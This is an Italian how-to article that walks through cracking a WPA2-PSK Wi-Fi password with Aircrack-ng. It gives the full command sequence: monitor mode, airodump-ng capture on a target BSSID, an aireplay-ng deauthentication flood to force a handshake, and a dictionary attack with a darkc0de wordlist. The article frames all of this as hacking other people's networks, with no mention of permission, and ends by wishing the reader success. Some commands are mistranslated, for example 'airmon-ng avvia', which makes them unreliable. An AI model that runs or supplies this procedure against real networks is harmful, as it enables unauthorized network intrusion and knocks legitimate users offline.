Quando il Wi-Fi fu sviluppato per la prima volta alla fine degli anni '90, fu creato Wired Equivalent Privacy (WEP) per proteggere le comunicazioni wireless, ma era difettoso e facilmente violabile. Per questo motivo, la maggior parte dei punti di accesso wireless oggi utilizza Wi-Fi Protected Access II con una chiave precondivisa per la sicurezza wireless , nota anche come WPA2-PSK. WPA2 utilizza un algoritmo di crittografia più potente, AES, quindi è difficile da decifrare, ma non impossibile. Il punto debole del sistema WPA2-PSK è che la password crittografata viene condivisa durante l'handshake a 4 vie. Quando il client esegue l'autenticazione presso il punto di accesso (AP), il client e l'AP eseguono un handshake a 4 vie per autenticare l'utente presso l'AP. Questo è il momento di hackerare le password.
In questo articolo utilizzeremo Aircrack-Ng e un attacco dizionario con password crittografate derivate dal processo di handshake a 4 vie.
Come hackerare la password WiFi con Aircrack-Ng
Passaggio 1: configura l'adattatore Wi-Fi in modalità monitor con Airmon-Ng
Per prima cosa dobbiamo utilizzare un adattatore di rete wireless compatibile con Kali Linux.
Questa operazione è simile all'impostazione dell'adattatore cablato in modalità promiscua. Consente la visibilità di tutto il traffico wireless in transito. Apri la finestra Terminale e digita:
airmon-ng avvia wlan0
Nota: airmon-ng rinomina l'adattatore wlan0 in mon0.
Passaggio 2 : ottieni informazioni sul traffico con Airodump-Ng
Ora l'adattatore wireless è in modalità Monitor, quindi è possibile vedere tutto il traffico wireless in transito. Ottieni informazioni sul traffico utilizzando il comando airodump-ng.
Questo comando prenderà tutto il traffico che l'adattatore wireless può vedere e visualizzerà informazioni importanti su di esso come BSSID (indirizzo MAC dell'AP), alimentazione, numero di frame del beacon, numero di frame di dati, canale, velocità, crittografia (se applicabile) e infine il ESSID (SSID). Digitare il seguente comando nel terminale:
airodump-ng mon0
Nota: tutti gli AP visibili sono elencati nella parte superiore dello schermo, mentre i client sono elencati nella parte inferiore dello schermo.
Passaggio 3: centralizza Airodump-Ng su un punto di accesso su un canale
Il prossimo passo dovremmo concentrarci su un AP su un canale e raccogliere dati importanti da lì. Per fare questo hai bisogno del BSSID e del canale, apri un'altra finestra di Terminale e digita:
airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
- 08:86:30:74:22:76 è il BSSID dell'AP
- -c 6 è il canale su cui sta operando l'AP
- WPAcrack è il file che vuoi scrivere
- mon0 è l'adattatore wireless
Come mostrato nello screenshot qui sopra, concentrati sulla raccolta dei dati da un AP con ESSID di Belkin276 sul canale 6.
Passaggio 4: Aireplay-Ng Deauth
Per recuperare la password crittografata, è necessario che il client si autentichi presso l'AP. Se già autenticati, possiamo annullare l'autenticazione e il sistema si autenticherà automaticamente, potendo così ottenere la password crittografata. Apri un'altra finestra di terminale e digita:
aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
- 100 è il numero di frame di deautenticazione
- 08:86:30:74:22:76 è il BSSID dell'AP
- mon0 è l'adattatore wireless
Passaggio 5: processo di handshake in 4 fasi
Nel passaggio precedente, quando autenticano nuovamente la password, airodump-ng proverà a ottenere la password durante l'handshake a 4 vie. Ritorna alla finestra del terminale airodump-ng e controlla se ha avuto successo o meno.
Se nella riga in alto a destra è riportato " handshake WPA ", significa che il processo di recupero della password di crittografia ha avuto successo.
Passaggio 6: ora abbiamo la password crittografata nel file WPAcrack. Esegui il file utilizzando un file di password, qui utilizzando l'elenco di password predefinito denominato darkcOde. Ora, decifra la password aprendo un terminale e digitando:
aircrack-ng WPAcrack-01.cap -w /pentest/password/wordlists/darkc0de
- WPAcrack-01.cap è il nome del file scritto nel comando airodump-ng
- /pentest/passwords/wordlist/darkc0de è il percorso assoluto del file delle password
Questo processo può essere relativamente lento e noioso. A seconda della lunghezza dell'elenco delle password, potrebbe essere necessario attendere da alcuni minuti ad alcuni giorni. Una volta trovata la password, verrà visualizzata sullo schermo. Ricorda, il file della password è molto importante. Prova prima il file delle password predefinito e, se fallisce, passa a un file delle password più grande e completo.
Potresti voler sapere: come hackerare la password Wifi usando Wifiphisher
Ti auguro successo!